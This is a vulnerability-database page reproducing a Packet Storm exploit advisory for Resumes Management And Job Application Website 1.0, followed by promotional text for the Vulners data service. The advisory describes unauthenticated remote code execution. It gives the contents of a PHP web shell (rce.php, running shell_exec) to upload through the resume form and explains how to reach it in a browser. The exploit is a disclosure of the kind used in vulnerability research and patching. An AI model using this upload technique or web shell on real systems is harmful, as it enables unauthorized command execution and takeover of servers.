Lucene search
K

Resumes Management And Job Application Website 1.0 Shell Upload

🗓️ 04 Jan 2021 00:00:00Reported by Arnav TripathyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 180 Views

Resumes Management And Job Application Website 1.0 Shell Upload unauthenticated RC

Code
`# Exploit Title: Resumes-management-and-job-application-website  
unauthenticated RCE  
# Date: 3/1/2021  
# Exploit Author: Arnav Tripathy  
# Vendor Homepage: https://egavilanmedia.com  
# Software Link:  
https://egavilanmedia.com/resumes-management-and-job-application-website/  
# Version: 1.0  
# Tested on: linux/lamp  
  
Submit rce.php in resume file upload unauthenticated.Contents of rce.php  
<?php  
$output = shell_exec('whoami');  
echo "<h1>$output</h1>";  
?>  
  
Navigate to http://localhost/Resumes Management and Job Application  
Website/files/rce.php  
  
You will get the output of whoami  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation